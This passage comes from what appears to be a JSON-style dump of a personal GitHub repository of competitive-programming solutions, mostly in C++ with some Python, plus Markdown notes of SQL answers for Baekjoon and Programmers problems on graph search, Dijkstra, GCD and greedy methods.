; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n) continue;\n if(find(like.begin(), like.end(), classroom[nx][ny]) != like.end()) {\n cnt++;\n }\n }\n\n return cnt;\n}\n\nint getEmptyCount(int x, int y) {\n int cnt = 0;\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n ) continue;\n if(classroom[nx][ny] == 0) cnt++;\n }\n\n return cnt;\n}\n\nint step1(int num, int student) {\n vector<int> like;\n int maxNum = -1, maxCnt = 0, x = 0, y = 0;\n\n for(int i = 1 ; i <= 4 ; i++) like.push_back(v[num][i]);\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(classroom[i][j] > 0) continue;\n int cnt = getLikeStd(i, j, like);\n \n if(cnt > maxNum) {\n maxNum = cnt;\n maxCnt = 0;\n location_1.clear();\n location_1.push_back(make_pair(i, j));\n x = i; y = j;\n }\n else if(cnt == maxNum) {\n maxCnt++;\n location_1.push_back(make_pair(i, j));\n }\n }\n }\n \n if(maxCnt == 0) {\n classroom[x][y] = student;\n return 1;\n }\n else return 0;\n}\n\nint step2(int num, int student) {\n vector<int> like;\n int maxNum = -1, maxCnt = 0, x, y;\n\n for(int i = 1 ; i <= 4 ; i++) like.push_back(v[num][i]);\n\n for(int i = 0 ; i < location_1.size() ; i++) {\n int cnt = getEmptyCount(location_1[i].first, location_1[i].second);\n \n if(cnt > maxNum) {\n maxNum = cnt;\n maxCnt = 0;\n location_2.clear();\n location_2.push_back(make_pair(location_1[i].first, location_1[i].second));\n x = location_1[i].first; y = location_1[i].second;\n }\n else if(cnt == maxNum) {\n maxCnt++;\n location_2.push_back(make_pair(location_1[i].first, location_1[i].second));\n }\n }\n\n if(maxCnt == 0) {\n classroom[x][y] = student;\n return 1;\n }\n else return 0;\n}\n\nvoid step3(int num, int student) {\n vector<pair<int,int>> rowCol;\n int x, y;\n\n for(int i = 0 ; i < location_2.size() ; i++) {\n rowCol.push_back(make_pair(location_2[i].first, location_2[i].second));\n }\n\n sort(rowCol.begin(), rowCol.end());\n\n x = rowCol[0].first;\n y = rowCol[0].second;\n\n classroom[x][y] = student;\n return;\n}\n\nint calcVal(int x, int y, int num) {\n int idx, cnt = 0;\n\n for(int i = 0 ; i < n * n ; i++) {\n if(v[i][0] == num) {\n idx = i;\n }\n }\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n) continue;\n if(find(v[idx].begin(), v[idx].end(), classroom[nx][ny]) != v[idx].end()) cnt++;\n }\n\n return 
cnt; \n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b, ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < n * n ; i++) {\n cin >> a;\n v[i].push_back(a);\n\n for(int j = 0 ; j < 4 ; j++) { // 좋아하는 학생\n cin >> b;\n v[i].push_back(b);\n }\n }\n\n for(int i = 0 ; i < n * n ; i++) {\n int idx;\n idx = v[i][0];\n\n if(step1(i, idx)) continue;\n if(step2(i, idx)) continue;\n step3(i, idx);\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n int cnt = calcVal(i, j, classroom[i][j]);\n if (cnt > 0) ans += pow(10, cnt - 1);\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.33816424012184143, "alphanum_fraction": 0.3719806671142578, "avg_line_length": 17.294116973876953, "blob_id": "48e91a14b06c536341ddef627c437bab4b1ed7e1", "content_id": "4453bcb9db961aa8a6d1a87870c4e1019fad27f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 637, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/BOJ/Implementation/14235.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14235번: 크리스마스 선물\n2022-01-14\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n priority_queue<int> pq;\n int n, a, num;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> a;\n\n if(a > 0){\n for(int j = 0 ; j < a ; j++){\n cin >> num;\n pq.push(num);\n }\n }\n else{\n if(pq.empty()) cout << -1 << '\\n';\n else {\n cout << pq.top() << '\\n';\n pq.pop();\n }\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3947368562221527, "alphanum_fraction": 0.4254385828971863, "avg_line_length": 18.571428298950195, "blob_id": "8e767093ee385f313a46f0973e41ef290636ec4a", "content_id": "fb60dd4dd4a6bc37b7794b092d5618ae205a710e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 688, "license_type": "no_license", "max_line_length": 63, "num_lines": 35, "path": "/BOJ/Mathematics/9613.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9613번: GCD 합\nDATE: 2022-01-24\nEuclidean algorithm\n*/\n#include <iostream>\nusing namespace std;\n\nlong long gcd(int a, int b){\n return b ? gcd(b, a % b): a;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc, n;\n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++){\n cin >> n;\n long long arr[n], sum = 0;\n\n for(int j = 0 ; j < n ; j++) cin >> arr[j];\n\n for(int j = 0 ; j < n ; j++){\n for(int k = j + 1 ; k < n ; k++){\n if(arr[j] > arr[k]) sum += gcd(arr[j], arr[k]);\n else sum += gcd(arr[k], arr[j]);\n }\n }\n\n cout << sum << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.6203208565711975, "alphanum_fraction": 0.6541889309883118, "avg_line_length": 22.375, "blob_id": "fe50943633c2dfc5448ac89b5416816acdb58904", "content_id": "d5ec00616e1ac7b9f0e3d2ec640e59d5905973c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 607, "license_type": "no_license", "max_line_length": 93, "num_lines": 24, "path": "/programmers/SQL/ETC.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "**[1. 
우유와 요거트가 담긴 장바구니 (Level 4)](https://programmers.co.kr/learn/courses/30/lessons/62284)**\n\n```sql\nSELECT DISTINCT A.CART_ID\nFROM CART_PRODUCTS A INNER JOIN CART_PRODUCTS B ON A.CART_ID = B.CART_ID\nWHERE (A.NAME IN ('Milk', 'Yogurt') and B.NAME IN ('Milk', 'Yogurt')) and A.NAME != B.NAME\nORDER BY A.CART_ID\n```\n\n<br/>\n\n**[2. 헤비 유저가 소유한 장소 (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/77487)**\n\n```sql\nSELECT *\nFROM PLACES\nWHERE HOST_ID IN (\n SELECT HOST_ID\n FROM PLACES\n GROUP BY HOST_ID\n HAVING COUNT(*) >= 2\n)\nORDER BY ID\n```\n" }, { "alpha_fraction": 0.32755032181739807, "alphanum_fraction": 0.367106169462204, "avg_line_length": 19.309858322143555, "blob_id": "d7bd065709d781e35ebe6e71c545af9bc87ea9e1", "content_id": "34b22d39d7ce7186be48b34860a3a2920edd66d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1451, "license_type": "no_license", "max_line_length": 99, "num_lines": 71, "path": "/BOJ/BFS_DFS/4963.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 4963번: 섬의 개수\nDATE: 2022-02-02\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 50\nusing namespace std;\n\nint w, h;\nint arr[MAX][MAX];\nbool visited[MAX][MAX];\nint dx[8] = {-1, -1, 0, 1, 1, 1, 0, -1};\nint dy[8] = {0, 1, 1, 1, 0, -1, -1, -1};\n\nvoid bfs(int x, int y) {\n queue<pair<int,int>> q;\n\n q.push({x, y});\n visited[x][y] = 1;\n\n while(!q.empty()){\n x = q.front().first;\n y = q.front().second;\n q.pop();\n\n for(int i = 0 ; i < 8 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= h || ny >= w || visited[nx][ny] || !arr[nx][ny]) continue;\n\n q.push({nx, ny});\n visited[nx][ny] = 1;\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n \n while(1) {\n cin >> w >> h;\n\n if(w == 0 && h == 0) break;\n int ans = 0;\n\n for(int i = 0 ; i < h ; i++) {\n for(int j = 0 ; j < w ; j++) {\n cin >> arr[i][j];\n }\n }\n\n for(int i = 0 ; i < h ; i++) {\n for(int j = 0 ; j < w ; j++) {\n if(arr[i][j] && !visited[i][j]) {\n bfs(i, j);\n ans++;\n }\n }\n }\n\n cout << ans << '\\n';\n\n fill(&arr[0][0], &arr[h - 1][w], 0);\n fill(&visited[0][0], &visited[h - 1][w], false);\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4458955228328705, "alphanum_fraction": 0.4670397937297821, "avg_line_length": 21.041095733642578, "blob_id": "a8a917540ec52a6f4c006fbc3bfdfe33bbbf9f9d", "content_id": "4c885d8b741a4250527502fe70cbe54a4c119954", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1630, "license_type": "no_license", "max_line_length": 94, "num_lines": 73, "path": "/BOJ/Dijkstra/10282.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10282번: 해킹\nDATE: 2022-01-11\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <algorithm>\n#define MAX 10001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int,int>> graph[MAX];\nint dst[MAX];\n\nvoid dijkstra(int start){\n priority_queue<pair<int,int>, vector<pair<int,int>>, greater<pair<int,int>>> pq; // 거리, 노드\n\n pq.push({0, start});\n dst[start] = 0;\n\n while(!pq.empty()){\n int distance = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(distance > dst[cur]) continue;\n for(int i = 0 ; i < graph[cur].size() ; i++){\n int newDistance = graph[cur][i].second;\n int next = graph[cur][i].first;\n\n if(distance + newDistance < dst[next]){\n dst[next] = distance + 
newDistance;\n pq.push({dst[next], next});\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t;\n int n, d, c;\n int a, b, s;\n cin >> t;\n\n for(int i = 0 ; i < t ; i++){\n cin >> n >> d >> c;\n\n for(int j = 0 ; j < d ; j++){\n cin >> a >> b >> s;\n graph[b].push_back({a, s}); // a가 b를 의존 \n }\n\n fill(dst, dst + n + 1, INF);\n dijkstra(c);\n \n int maximum = -1, cnt = 0;\n\n for(int j = 1 ; j <= n ; j++) {\n if(dst[j] == INF) continue;\n maximum = max(maximum, dst[j]);\n cnt++;\n }\n\n cout << cnt << \" \" << maximum << '\\n';\n\n for(int j = 1 ; j <= n ; j++) graph[j].clear();\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3928571343421936, "alphanum_fraction": 0.41474655270576477, "avg_line_length": 24.79207992553711, "blob_id": "84c21a9cccd00fb251d2f78f9ec7c31ece158c7a", "content_id": "820841ba72e9ca16e60251b5e2dd6db0f1b13473", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2656, "license_type": "no_license", "max_line_length": 86, "num_lines": 101, "path": "/programmers/Level 2/maximize_formula.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "//programmers Level 2 : Maximize formula\n//2020 KAKAO Internship\n//2021-04-30\n#include <string>\n#include <vector>\n#include <queue>\n#include <iostream>\nusing namespace std;\n\nvector<string> op, new_exp, cp;\npriority_queue<long long> pq;\nint n;\nlong long pArr[3] = {0,};\nbool check[4] = {false,};\n\nvoid permutation(int depth){\n if(depth == n){\n long long num;\n \n for(int i = 0 ; i < n ; i++){ //연산자 우선순위대로\n for(int j = 0 ; j < new_exp.size() ; j++){\n if(new_exp[j] == op[pArr[i] - 1]){ //연산자\n if(new_exp[j] == \"+\")\n num = stoll(new_exp[j-1]) + stoll(new_exp[j+1]); \n else if(new_exp[j] == \"-\")\n num = stoll(new_exp[j-1]) - stoll(new_exp[j+1]);\n else if(new_exp[j] == \"*\")\n num = stoll(new_exp[j-1]) * stoll(new_exp[j+1]);\n \n new_exp.insert(new_exp.begin() + (j+2), to_string(num));\n new_exp.erase(new_exp.begin() + (j-1), new_exp.begin() + (j + 2));\n \n j = -1;\n }\n }\n }\n \n num = stoll(new_exp[0]);\n pq.push(abs(num));\n \n new_exp = cp;\n \n return;\n }\n \n for(int i = 1 ; i <= n ; i++){\n if(!check[i]){\n check[i] = true;\n pArr[depth] = i;\n permutation(depth + 1);\n check[i] = false;\n }\n }\n}\n\nlong long solution(string expression) {\n long long answer = 0;\n int plus=0, minus=0, mul=0;\n string tmp;\n \n for(int i = 0 ; i < expression.length() ; i++){\n if(expression[i] != '*' && expression[i] != '+' && expression[i] != '-'){\n tmp += expression[i];\n if(i == expression.length() - 1)\n new_exp.push_back(tmp);\n }\n else{\n new_exp.push_back(tmp);\n tmp = expression[i];\n new_exp.push_back(tmp);\n tmp = \"\";\n }\n \n if(expression[i] == '+' && plus == 0){\n op.push_back(\"+\"); plus++;\n }\n else if(expression[i] == '-' && minus == 0){\n op.push_back(\"-\"); minus++;\n }\n else if(expression[i] == '*' && mul == 0){\n op.push_back(\"*\"); mul++;\n }\n }\n \n cp = new_exp;\n n = op.size(); //식에 존재하는 연산자 종류의 개수\n \n permutation(0);\n answer = pq.top();\n \n return answer;\n}\n\nint main(){\n long long ans;\n ans = solution(\"100-200*300-500+20\");\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.444726824760437, "alphanum_fraction": 0.4803049564361572, "avg_line_length": 20.29729652404785, "blob_id": "b3bea8df186a64dcc479d44f4ef34a3f95aa6c41", "content_id": "021fcbff812c007121f1a8353b539532212d90dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"C++", "length_bytes": 821, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/BOJ/Implementation/15927.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/* \nBOJ 15927번: 회문은 회문아니야!!\n2021-12-21\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str, front, back;\n bool flag = true;\n cin >> str;\n\n int length = str.length();\n \n front = str.substr(0, length / 2);\n\n if(length % 2 == 0) back = str.substr(length / 2);\n else back = str.substr(length / 2 + 1);\n\n reverse(back.begin(), back.end());\n\n if(front == back) { // 팰린드롬 O\n for(int i = 1 ; i < length ; i++) {\n if(str[i - 1] != str[i]) {\n cout << length - 1;\n flag = false;\n break;\n }\n }\n if(flag) cout << -1;\n }\n else cout << str.length(); // 팰린드롬 X\n \n return 0;\n}" }, { "alpha_fraction": 0.4695945978164673, "alphanum_fraction": 0.5304054021835327, "avg_line_length": 15.5, "blob_id": "c1ea345fe0f447c0f5aad2dec7888096c1b68134", "content_id": "559651b232ca9adbb9866c096f0378eba62f86da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 41, "num_lines": 18, "path": "/BOJ/Mathematics/1735_1.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 1735_1.py (gcd 함수 구현)\n# BOJ 1735: 분수 합\n# DATE: 2022-03-16\nimport sys\nread = sys.stdin.readline\n\ndef gcd(n, m):\n return n if m == 0 else gcd(m, n % m)\n \na, b = map(int, read().split())\nc, d = map(int, read().split())\n\nn = a * d + b * c\nm = b * d\n\ndiv = gcd(n, m)\n\nprint(n // div, m // div)" }, { "alpha_fraction": 0.42236024141311646, "alphanum_fraction": 0.47204968333244324, "avg_line_length": 19.1875, "blob_id": "c5bced023e2fbaa5132da1f3084d46a0a0a3e8ca", "content_id": "24b94f0f0a818bf23773d43a1a5b8769d3f43af5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 336, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/programmers/Level 2/remove_pair.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 2: 짝지어 제거하기\n# date: 2022-06-10\ndef solution(s):\n answer = -1\n list = []\n \n for i in s:\n if len(list) == 0 or list[-1] != i:\n list.append(i)\n elif list[-1] == i:\n list.pop()\n \n if len(list) > 0: answer = 0\n else: answer = 1\n \n return answer" }, { "alpha_fraction": 0.3726937174797058, "alphanum_fraction": 0.4132841229438782, "avg_line_length": 16.516128540039062, "blob_id": "c2ee8a13a114623a38f920d0c3f5be4afdf6d43f", "content_id": "e69f7bf96303a4d60131fdeee70d058299aebff7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 556, "license_type": "no_license", "max_line_length": 58, "num_lines": 31, "path": "/BOJ/Greedy/2828.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2828번: 사과 담기 게임\n2021-03-26\n*/\n#include <iostream>\n#include <cstdlib>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, a, dst=0, now = 1;\n cin >> n >> m >> a;\n\n for(int i = 0 ; i < a ; i++){\n int num;\n cin >> num;\n\n if(num > (now + m -1)){\n dst += num - (now + m -1);\n now = num - m + 1;\n }\n else if(num < now){\n dst += now - num;\n now = num;\n }\n }\n\n cout << dst;\n\n return 0;\n}" }, { "alpha_fraction": 0.5082417726516724, 
"alphanum_fraction": 0.557692289352417, "avg_line_length": 16.380952835083008, "blob_id": "cbf45ed529399f6ea56ca74d6a7179e6950a8c37", "content_id": "669870feb755e3666b19f26fdc8dd3ff912e1fd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 376, "license_type": "no_license", "max_line_length": 58, "num_lines": 21, "path": "/BOJ/Mathematics/1850.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1850번: 최대공약수\nDATE: 2022-01-24\nEuclidean algorithm\n*/\n#include <iostream>\nusing namespace std;\n\nlong long gcd(long long a, long long b) {\n return b ? gcd(b, a % b) : a;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long a, b;\n cin >> a >> b;\n \n for(int i = 0 ; i < gcd(a, b) ; i++) cout << 1;\n\n return 0;\n}" }, { "alpha_fraction": 0.44692736864089966, "alphanum_fraction": 0.48603352904319763, "avg_line_length": 16.071428298950195, "blob_id": "97c27f87b866ed3b5e3fa049c02b09618f00df95", "content_id": "01dab643e753a95108f21522df178a0c5d0ea95f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 732, "license_type": "no_license", "max_line_length": 58, "num_lines": 42, "path": "/BOJ/BFS_DFS/11725.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11725번: 트리의 부모 찾기\nDATE: 2022-02-02\nDFS\n*/\n#include <iostream>\n#include <vector>\n#define MAX 100001\nusing namespace std;\n\nvector<int> graph[MAX];\nint n;\nint arr[MAX];\n\nvoid dfs(int node) {\n for(int i = 0 ; i < graph[node].size() ; i++) {\n int nextNode = graph[node][i];\n\n if(!arr[nextNode]) {\n arr[nextNode] = node;\n dfs(nextNode);\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b;\n cin >> n;\n\n for(int i = 0 ; i < n - 1 ; i++) {\n cin >> a >> b; \n graph[a].push_back(b);\n graph[b].push_back(a);\n }\n\n dfs(1);\n\n for(int i = 2 ; i <= n ; i++) cout << arr[i] << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.5020464062690735, "alphanum_fraction": 0.5279672741889954, "avg_line_length": 15.681818008422852, "blob_id": "9d0d12136cb9fb23aad5c185c1b6b9a41b72d38d", "content_id": "4e2242cb0bbfdd6ac48468332c7385b2890f1a95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 747, "license_type": "no_license", "max_line_length": 58, "num_lines": 44, "path": "/BOJ/Mathematics/1747.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1747번: 소수&팰린드롬\n2021-12-26\n*/\n#include <iostream>\n#include <math.h>\n#include <algorithm>\nusing namespace std;\n\nbool isPrime(int num) {\n if (num < 2) return false;\n\n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n\n return true;\n}\n\nbool checkPalindrome(string str) {\n string front, back;\n\n front = str;\n reverse(str.begin(), str.end());\n back = str;\n\n if(front == back) return true;\n else return false;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = n ; ; i++) {\n if(isPrime(i) && checkPalindrome(to_string(i))){\n cout << i;\n break;\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.6327160596847534, "alphanum_fraction": 0.6800411343574524, "avg_line_length": 20.600000381469727, "blob_id": "ecf8f77b94fe6f40e0db2f72c91e1eb86edff2f9", "content_id": "3ce3dbc6d954315120a09119037e811a73b29482", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Markdown", "length_bytes": 1038, "license_type": "no_license", "max_line_length": 109, "num_lines": 45, "path": "/programmers/SQL/GROUP BY.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# GROUP BY\n\n**[1. 고양이와 개는 몇 마리 있을까 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59040)**\n\n```sql\nSELECT ANIMAL_TYPE, COUNT(ANIMAL_TYPE) as COUNT\nFROM ANIMAL_INS\nGROUP BY ANIMAL_TYPE\nORDER BY ANIMAL_TYPE\n```\n\n<br/>\n\n**[2. 동명 동물 수 찾기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59041)**\n\n```sql\nSELECT NAME, COUNT(NAME) as COUNT\nFROM ANIMAL_INS\nGROUP BY NAME\nHAVING COUNT(NAME) >= 2\nORDER BY NAME\n```\n\n<br/>\n\n**[3. 입양 시각 구하기(1) (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59412)**\n\n```sql\nSELECT HOUR(DATETIME) as HOUR, COUNT(HOUR(DATETIME)) as COUNT\nFROM ANIMAL_OUTS\nGROUP BY HOUR(DATETIME)\nHAVING HOUR > 8 and HOUR < 20\nORDER BY HOUR(DATETIME)\n```\n\n<br/>\n\n**[4. 입양 시각 구하기(2) (Level 4)](https://programmers.co.kr/learn/courses/30/lessons/59413)**\n\n```sql\nSET @HOUR := -1;\nSELECT (@HOUR := @HOUR + 1) AS HOUR, (SELECT COUNT(*) FROM ANIMAL_OUTS WHERE HOUR(DATETIME) = @HOUR) AS COUNT\nFROM ANIMAL_OUTS\nWHERE @HOUR < 23\n```\n" }, { "alpha_fraction": 0.36328125, "alphanum_fraction": 0.40234375, "avg_line_length": 17.981481552124023, "blob_id": "5a147d7d4679caaa5789d9d3157e64d072eaf219", "content_id": "31beab9809d508f20b66c469b5f631ae7408266a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 58, "num_lines": 54, "path": "/BOJ/BFS_DFS/1926.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1926번: 그림\nDATE: 2022-02-03\nDFS\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 501\nusing namespace std;\n\nint n, m, maxVal = 0, cnt = 0;\nint arr[MAX][MAX];\nbool visited[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid dfs(int x, int y) {\n visited[x][y] = true;\n cnt++;\n\n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(arr[nx][ny] && !visited[nx][ny]) dfs(nx, ny);\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int num = 0;\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n cin >> arr[i][j];\n }\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n if(arr[i][j] == 1 && !visited[i][j]) {\n dfs(i, j);\n num++;\n maxVal = max(maxVal, cnt);\n cnt = 0;\n }\n }\n }\n\n cout << num << '\\n' << maxVal;\n\n return 0;\n}" }, { "alpha_fraction": 0.4854961931705475, "alphanum_fraction": 0.5297709703445435, "avg_line_length": 13.909090995788574, "blob_id": "6e7e683b5241ff9c6293888fe36958940937a3e6", "content_id": "29ba31e98a8496e3325baa1bed15c01e96f90286", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 715, "license_type": "no_license", "max_line_length": 70, "num_lines": 44, "path": "/BOJ/Greedy/15903.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 15903번: 카드 합체 놀이\nDATE: 2021-01-10\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n\tint n, m, a;\n\tlong long num1, num2, sum = 0;\n\tpriority_queue<long long, vector <long long>, greater <long long>>pq;\n\t\n\tcin >> n >> m;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> 
a;\n\t\tpq.push(a);\n\t}\n\t\n\tfor (int j = 0; j < m; j++) {\n\t\t//가장 작은 두 값\n\t\tnum1 = pq.top();\n\t\tpq.pop();\n\t\tnum2 = pq.top();\n\t\tpq.pop();\n\n\t\t//더한 값으로 덮어쓰기\n\t\tpq.push(num1 + num2);\n\t\tpq.push(num1 + num2);\n\t}\n\n\t//모든 카드 값 더하기\n\tfor (int k = 0; k < n; k++) {\n\t\tsum += pq.top();\n\t\tpq.pop();\n\t}\n\n\tcout << sum;\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.4328097701072693, "alphanum_fraction": 0.47294938564300537, "avg_line_length": 14.94444465637207, "blob_id": "14864c3f2e1299eb2a1688cb43232729b098a4da", "content_id": "3c1b51fa0649192d42d5c4d5f87142d9891b287f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 577, "license_type": "no_license", "max_line_length": 59, "num_lines": 36, "path": "/BOJ/BFS_DFS/15652.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15652번: N과 M (4)\n2022-01-06\nBacktracking\n*/\n#include <iostream>\n#define MAX 9\nusing namespace std;\n\nint n, m;\nint arr[MAX];\nbool visited[MAX];\n\nvoid dfs(int num, int cnt){\n if(cnt == m) {\n for(int i = 0 ; i < m ; i++) cout << arr[i] << \" \";\n cout << '\\n';\n return;\n }\n\n for(int i = num ; i <= n ; i++){\n arr[cnt] = i;\n visited[i] = true;\n dfs(i, cnt + 1);\n visited[i] = false;\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n dfs(1, 0);\n\n return 0;\n}" }, { "alpha_fraction": 0.47894737124443054, "alphanum_fraction": 0.5105262994766235, "avg_line_length": 16.31818199157715, "blob_id": "fd47cb694e93e865f1a5e0806847657a5dfa5ac8", "content_id": "c1055e49b17d10f838b1e80bb3346f4a22602686", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 384, "license_type": "no_license", "max_line_length": 41, "num_lines": 22, "path": "/programmers/Level 1/budget.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 예산\ndate: 2022-03-30\n*/\n#include <string>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint solution(vector<int> d, int budget) {\n int answer = 0, sum = 0;\n \n sort(d.begin(), d.end());\n \n for(int i = 0 ; i < d.size() ; i++) {\n if((sum += d[i]) <= budget) {\n answer++;\n }\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.43449297547340393, "alphanum_fraction": 0.4581791162490845, "avg_line_length": 19.484848022460938, "blob_id": "66227b6c6e3e502252790d4a8c7ed119efc7ade7", "content_id": "e091179d31774144d650a9a82bf8b756d27d0ec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 59, "num_lines": 66, "path": "/BOJ/Brute Force/1339.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1339번: 단어 수학\nDATE: 2021-07-18\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nchar alpha[256];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n vector<string> word;\n vector<char> ch;\n string str;\n int n, maximum=-1;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> str;\n word.push_back(str);\n }\n\n for(int i = 0 ; i < word.size() ; i++){\n cin >> word[i];\n for(int j = 0 ; j < word[i].length() ; j++){\n ch.push_back(word[i][j]);\n }\n }\n\n sort(ch.begin(), 